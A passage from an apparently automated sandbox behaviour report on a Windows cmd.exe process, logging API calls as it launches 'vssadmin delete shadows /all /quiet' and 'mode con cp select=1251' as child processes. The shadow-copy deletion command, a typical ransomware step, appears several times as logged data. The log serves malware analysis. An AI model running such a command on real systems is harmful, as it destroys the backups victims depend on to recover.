returned 0x220000 [0267.919] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xe8) returned 0x239c60 [0267.919] GetProcessHeap () returned 0x220000 [0267.919] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x239c60, Size=0x7e) returned 0x239c60 [0267.919] GetProcessHeap () returned 0x220000 [0267.919] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x239c60) returned 0x7e [0267.919] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0267.919] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x1cea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cea80) returned 0x235cc0 [0267.919] FindClose (in: hFindFile=0x235cc0 | out: hFindFile=0x235cc0) returned 1 [0267.919] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x1cea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cea80) returned 0xffffffffffffffff [0267.919] GetLastError () returned 0x2 [0267.919] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x1cea80, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cea80) returned 0x241040 [0267.919] FindClose (in: hFindFile=0x241040 | out: hFindFile=0x241040) returned 1 [0267.920] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0267.920] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0267.920] GetConsoleTitleW (in: lpConsoleTitle=0x1cefd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0267.920] GetProcessHeap () returned 0x220000 [0267.920] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x21c) returned 0x23bb20 [0267.920] GetConsoleTitleW (in: lpConsoleTitle=0x23bb30, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0267.920] GetProcessHeap () returned 0x220000 [0267.920] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x23bb20, Size=0xa2) returned 0x23bb20 [0267.920] GetProcessHeap () returned 0x220000 [0267.920] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x23bb20) returned 0xa2 [0267.920] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - vssadmin delete shadows /all /quiet") returned 1 [0267.920] GetProcessHeap () returned 0x220000 [0267.921] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23bb20 | out: hHeap=0x220000) returned 1 [0267.921] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ced88, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ced48 | out: lpAttributeList=0x1ced88, lpSize=0x1ced48) returned 1 [0267.921] UpdateProcThreadAttribute (in: lpAttributeList=0x1ced88, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ced38, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ced88, lpPreviousValue=0x0) returned 1 [0267.921] GetStartupInfoW (in: lpStartupInfo=0x1ceea0 | out: lpStartupInfo=0x1ceea0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4)) [0267.921] GetProcessHeap () returned 0x220000 [0267.921] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x20) returned 0x234660 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0267.921] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0267.922] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0267.922] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0267.922] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0267.922] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0267.922] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0267.922] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0267.922] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0267.922] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0267.922] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0267.922] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0267.922] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0267.922] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0267.922] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0267.922] GetProcessHeap () returned 0x220000 [0267.922] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x234660 | out: hHeap=0x220000) returned 1 [0267.922] GetProcessHeap () returned 0x220000 [0267.922] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x12) returned 0x239ac0 [0267.922] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1cedc0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="vssadmin delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1ced70 | out: lpCommandLine="vssadmin delete shadows /all /quiet", lpProcessInformation=0x1ced70*(hProcess=0x50, hThread=0x54, dwProcessId=0x654, dwThreadId=0x658)) returned 1 [0267.929] CloseHandle (hObject=0x54) returned 1 [0267.929] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0267.929] GetProcessHeap () returned 0x220000 [0267.929] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23f4e0 | out: hHeap=0x220000) returned 1 [0267.929] GetEnvironmentStringsW () returned 0x2389c0* [0267.929] GetProcessHeap () returned 0x220000 [0267.929] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb22) returned 0x23e9b0 [0267.929] FreeEnvironmentStringsW (penv=0x2389c0) returned 1 [0267.929] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x1ce678, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x1ce678, ReturnLength=0x0) returned 0x0 [0267.929] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffdf000, lpBuffer=0x1ce6b0, nSize=0x380, lpNumberOfBytesRead=0x1ce670 | out: lpBuffer=0x1ce6b0*, lpNumberOfBytesRead=0x1ce670*=0x380) returned 1 [0267.929] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0272.590] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1cecb8 | out: lpExitCode=0x1cecb8*=0x2) returned 1 [0272.590] CloseHandle (hObject=0x50) returned 1 [0272.590] _vsnwprintf (in: _Buffer=0x1cef28, _BufferCount=0x13, _Format="%08X", _ArgList=0x1cecc8 | out: _Buffer="00000002") returned 8 [0272.590] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0272.590] GetProcessHeap () returned 0x220000 [0272.590] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23e9b0 | out: hHeap=0x220000) returned 1 [0272.590] GetEnvironmentStringsW () returned 0x2389c0* [0272.590] GetProcessHeap () returned 0x220000 [0272.590] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb22) returned 0x23e9b0 [0272.590] FreeEnvironmentStringsW (penv=0x2389c0) returned 1 [0272.591] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0272.591] GetProcessHeap () returned 0x220000 [0272.591] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23e9b0 | out: hHeap=0x220000) returned 1 [0272.591] GetEnvironmentStringsW () returned 0x2389c0* [0272.591] GetProcessHeap () returned 0x220000 [0272.591] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb22) returned 0x23e9b0 [0272.591] FreeEnvironmentStringsW (penv=0x2389c0) returned 1 [0272.591] GetProcessHeap () returned 0x220000 [0272.591] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x239ac0 | out: hHeap=0x220000) returned 1 [0272.591] DeleteProcThreadAttributeList (in: lpAttributeList=0x1ced88 | out: lpAttributeList=0x1ced88) [0272.591] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1 [0272.591] _get_osfhandle (_FileHandle=1) returned 0xf4 [0272.591] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0272.592] _get_osfhandle (_FileHandle=1) returned 0xf4 [0272.592] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4a86e194 | out: lpMode=0x4a86e194) returned 0 [0272.592] _get_osfhandle (_FileHandle=0) returned 0xe8 [0272.592] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4a86e198 | out: lpMode=0x4a86e198) returned 0 [0272.592] GetConsoleOutputCP () returned 0x4e3 [0272.592] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a87bfe0 | out: lpCPInfo=0x4a87bfe0) returned 1 [0272.592] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0272.592] GetProcessHeap () returned 0x220000 [0272.592] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x239c60 | out: hHeap=0x220000) returned 1 [0272.592] GetProcessHeap () returned 0x220000 [0272.592] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23ba00 | out: hHeap=0x220000) returned 1 [0272.592] GetProcessHeap () returned 0x220000 [0272.592] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x235bb0 | out: hHeap=0x220000) returned 1 [0272.592] GetProcessHeap () returned 0x220000 [0272.592] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23b9a0 | out: hHeap=0x220000) returned 1 [0272.592] GetProcessHeap () returned 0x220000 [0272.592] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x239a50 | out: hHeap=0x220000) returned 1 [0272.592] GetProcessHeap () returned 0x220000 [0272.592] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23aae0 | out: hHeap=0x220000) returned 1 [0272.592] GetProcessHeap () returned 0x220000 [0272.592] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x240090 | out: hHeap=0x220000) returned 1 [0272.592] GetProcessHeap () returned 0x220000 [0272.592] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x234630 | out: hHeap=0x220000) returned 1 [0272.593] GetProcessHeap () returned 0x220000 [0272.593] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x239840 | out: hHeap=0x220000) returned 1 [0272.593] _vsnwprintf (in: _Buffer=0x4a886340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x1cf1e8 | out: _Buffer="\r\n") returned 2 [0272.593] _get_osfhandle (_FileHandle=1) returned 0xf4 [0272.593] GetFileType (hFile=0xf4) returned 0x3 [0272.593] _get_osfhandle (_FileHandle=1) returned 0xf4 [0272.593] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a87c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0272.593] WriteFile (in: hFile=0xf4, lpBuffer=0x4a87c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf1b8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesWritten=0x1cf1b8*=0x2, lpOverlapped=0x0) returned 1 [0272.593] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a86f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0272.593] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a87c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0272.593] _vsnwprintf (in: _Buffer=0x4a86eb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x1cf1f8 | out: _Buffer="C:\\Windows\\system32") returned 19 [0272.593] _vsnwprintf (in: _Buffer=0x4a86eb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x1cf1f8 | out: _Buffer=">") returned 1 [0272.593] _get_osfhandle (_FileHandle=1) returned 0xf4 [0272.593] GetFileType (hFile=0xf4) returned 0x3 [0272.593] _get_osfhandle (_FileHandle=1) returned 0xf4 [0272.593] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4a87c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0272.593] WriteFile (in: hFile=0xf4, lpBuffer=0x4a87c320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x1cf1e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesWritten=0x1cf1e8*=0x14, lpOverlapped=0x0) returned 1 [0272.593] _get_osfhandle (_FileHandle=0) returned 0xe8 [0272.593] GetFileType (hFile=0xe8) returned 0x3 [0272.593] _get_osfhandle (_FileHandle=0) returned 0xe8 [0272.593] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0272.593] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0272.593] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e320, cchWideChar=1 | out: lpWideCharStr="Essadmin delete shadows /all /quiet\n") returned 1 [0272.593] _get_osfhandle (_FileHandle=0) returned 0xe8 [0272.593] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0272.593] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0272.593] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e322, cchWideChar=1 | out: lpWideCharStr="xsadmin delete shadows /all /quiet\n") returned 1 [0272.593] _get_osfhandle (_FileHandle=0) returned 0xe8 [0272.593] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0272.593] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0272.593] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e324, cchWideChar=1 | out: lpWideCharStr="iadmin delete shadows /all /quiet\n") returned 1 [0272.594] _get_osfhandle (_FileHandle=0) returned 0xe8 [0272.594] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0272.594] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0272.594] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e326, cchWideChar=1 | out: lpWideCharStr="tdmin delete shadows /all /quiet\n") returned 1 [0272.594] _get_osfhandle (_FileHandle=0) returned 0xe8 [0272.594] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0272.594] ReadFile (in: hFile=0xe8, lpBuffer=0x4a87c320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x1cf4e8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesRead=0x1cf4e8*=0x1, lpOverlapped=0x0) returned 1 [0272.594] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4a87c320, cbMultiByte=1, lpWideCharStr=0x4a87e328, cchWideChar=1 | out: lpWideCharStr="\nmin delete shadows /all /quiet\n") returned 1 [0272.594] _get_osfhandle (_FileHandle=0) returned 0xe8 [0272.594] GetFileType (hFile=0xe8) returned 0x3 [0272.594] _get_osfhandle (_FileHandle=0) returned 0xe8 [0272.594] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0272.594] _get_osfhandle (_FileHandle=1) returned 0xf4 [0272.594] GetFileType (hFile=0xf4) returned 0x3 [0272.594] _get_osfhandle (_FileHandle=1) returned 0xf4 [0272.594] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="Exit\n", cchWideChar=-1, lpMultiByteStr=0x4a87c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Exit\n", lpUsedDefaultChar=0x0) returned 6 [0272.594] WriteFile (in: hFile=0xf4, lpBuffer=0x4a87c320*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x1cf4c8, lpOverlapped=0x0 | out: lpBuffer=0x4a87c320*, lpNumberOfBytesWritten=0x1cf4c8*=0x5, lpOverlapped=0x0) returned 1 [0272.594] GetProcessHeap () returned 0x220000 [0272.594] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x4012) returned 0x242010 [0272.594] GetProcessHeap () returned 0x220000 [0272.594] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x242010 | out: hHeap=0x220000) returned 1 [0272.594] GetProcessHeap () returned 0x220000 [0272.594] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb0) returned 0x239840 [0272.594] GetProcessHeap () returned 0x220000 [0272.594] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1a) returned 0x234630 [0272.594] GetConsoleOutputCP () returned 0x4e3 [0272.595] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4a87bfe0 | out: lpCPInfo=0x4a87bfe0) returned 1 [0272.595] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0272.595] GetConsoleTitleW (in: lpConsoleTitle=0x1cf480, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0272.595] GetProcessHeap () returned 0x220000 [0272.595] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x14) returned 0x238940 [0272.595] GetProcessHeap () returned 0x220000 [0272.595] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x1a) returned 0x234660 [0272.595] GetProcessHeap () returned 0x220000 [0272.595] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0x21c) returned 0x23b9a0 [0272.595] GetConsoleTitleW (in: lpConsoleTitle=0x23b9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0272.596] GetProcessHeap () returned 0x220000 [0272.596] RtlReAllocateHeap (Heap=0x220000, Flags=0x0, Ptr=0x23b9a0, Size=0x62) returned 0x23b9a0 [0272.596] GetProcessHeap () returned 0x220000 [0272.596] RtlSizeHeap (HeapHandle=0x220000, Flags=0x0, MemoryPointer=0x23b9a0) returned 0x62 [0272.596] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - Exit") returned 1 [0272.596] GetProcessHeap () returned 0x220000 [0272.596] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23b9a0 | out: hHeap=0x220000) returned 1 [0272.596] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1 [0272.597] exit (_Code=2) Process: id = "12" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0x6fcab000" os_pid = "0x60c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x540" cmd_line = "mode con cp select=1251" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e105" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 91 os_tid = 0x610 Process: id = "13" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x6fdce000" os_pid = "0x654" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0x540" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e105" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 92 os_tid = 0x658 Thread: id = 105 os_tid = 0x6b0 Thread: id = 106 os_tid = 0x6c4 Thread: id = 107 os_tid = 0x6cc Thread: id = 108 os_tid = 0x6d0